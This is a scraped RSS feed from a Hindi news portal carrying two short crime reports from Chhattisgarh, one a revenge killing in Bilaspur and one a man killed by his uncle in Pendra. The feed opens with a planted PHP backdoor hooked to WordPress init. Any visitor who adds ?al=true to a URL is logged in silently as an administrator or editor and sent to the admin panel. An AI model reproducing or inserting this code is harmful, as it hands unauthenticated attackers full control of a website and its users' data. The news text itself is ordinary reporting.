// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); killed young man – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 20 Aug 2024 14:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-बिलासपुर में युवक को तीन बेटों ने उतारा मौत के घाट, पिता की हत्या का लिया बदला https://pratyushaashakinayikiran.com/?p=62240 Tue, 20 Aug 2024 14:15:00 +0000 https://pratyushaashakinayikiran.com/?p=62240 बिलासपुर.

बिलासपुर के सरकंडा थाना क्षेत्र अंतर्गत ग्राम लगरा में पिता की हत्या का बदला लेने के लिए तीन बेटों ने मिलकर एक युवक की हत्या कर दी। युवक को अपने घर के पास देखते ही तीनों ने मिलकर लाठी-डंडे और धारदार फरसा से हमला कर दिया। जिससे उसकी मौके पर मौत हो गई। मृतक और उसका पिता 10 साल जेल में रहने के करीब दो माह पहले छूट कर अपने गांव आए हुए थे। इसके बाद यह घटना हो गई मामले में पुलिस ने दो आरोपी को गिरफ्तार कर लिया है और एक फरार है।

लगरा गांव के रहने वाले संतोष केवट का जमीन को लेकर अपने चचेरे भाइयों से विवाद चल रहा था। करीब 10 साल पहले संतोष केवट और उसके बेटे छतलाल केवट ने मिलकर अपने चचेरे भाइयों संतोष और तिलक केवट की हत्या कर दी थी। घटना को अंजाम देने के बाद दोनों जेल में सजा काट रहे थे। हाल ही में वे जेल से छूटकर बाहर आए थे। जिसके बाद तिलक केवट के बेटे हेमंत केवट, धर्मेंद्र केवट और जितेंद्र केवट ने मिलकर हत्या की साजिश रची। उन्होंने छतलाल केवट पर लाठी-डंडे और धारदार फरसे से हमला कर उसे मौत के घाट उतार दिया। हत्या के बाद तीनों भाई मौके फरार हो गये। सूचना मिलने पर मोपका पुलिस मौके पर पहुंची और आरोपियों की तलाश मे जुट गई। फिलहाल पुलिस ने धर्मेंद्र केवट और हेमंत गिरफ्तार को गिरफ्तार किया है। वहीं, जितेंद्र फरार है, जिसकी तलाश पुलिस कर रही है।

]]>
छत्तीसगढ़-पेंड्रा में मौसा ने की थी युवक की हत्या, पैसों को लेकर हुआ था विवाद https://pratyushaashakinayikiran.com/?p=47733 Wed, 03 Jul 2024 16:25:00 +0000 https://pratyushaashakinayikiran.com/?p=47733 पेंड्रा.

पेंड्रा थानाक्षेत्र में दो दिन पहले संदिग्ध परिस्थितियों में अपने रिश्तेदार के घर मिले युवक के शव के मामले में पुलिस ने खुलासा करते हुए मृतक के मौसा को गिरफ्तार किया है। आरोपी मौसा का मृतक के साथ पैसों को लेकर मामूली विवाद था। जिसके बाद आरोपी के द्वारा लोहे की रॉड से युवक पर वार कर उसे मौत के घाट उतार दिया। फिलहाल पुलिस आरोपी को गिरफ्तार कर मामले में आगे की कार्रवाई में जुट गई है।

पूरा मामला पेण्ड्रा थानाक्षेत्र के डोंगरिया गांव का है। यहां मरवाही थानाक्षेत्र के बरौर गांव का रहने वाला कृपाल सिंह के साढू का बेटा चौहान सिंह पिछले चार माह से अपने मौसा कृपाल सिंह के घर पर ही रहकर ट्रैक्टर चलाने का काम करता था। उसका संदिग्ध परिस्थितियों में शव दो दिन पहले उसके घर के एक कमरे में मिला था। जिसके बाद गांव में सनसनी फैल गई। मृतक चौहान सिंह के सिर पर गहरे वार के निशान भी थे। जिसकी सूचना गांव के कोटवार के द्वारा पेंड्रा पुलिस को दी गई। घटना की जानकारी मिलते ही पेंड्रा पुलिस मौके पर पहुंची और जांच में जुट गई। पुलिस ने मृतक के मौसा को इस मामले में गिरफ्तार किया है।  आरोपी के निशानदेही पर ही हत्या की वारदात को अंजाम देने के लिए प्रयुक्त की गई लोहे का रॉड भी बरामद कर ली गई है। वहीं, आरोपी कृपाल सिंह भी हत्या के पीछे मृतक चौहान सिंह के साथ पैसों के लेनदेन को लेकर वजह बताई है। फिलहाल पुलिस ने आरोपी को गिरफ्तार कर न्यायिक रिमांड में भेज दिया गया है।

]]>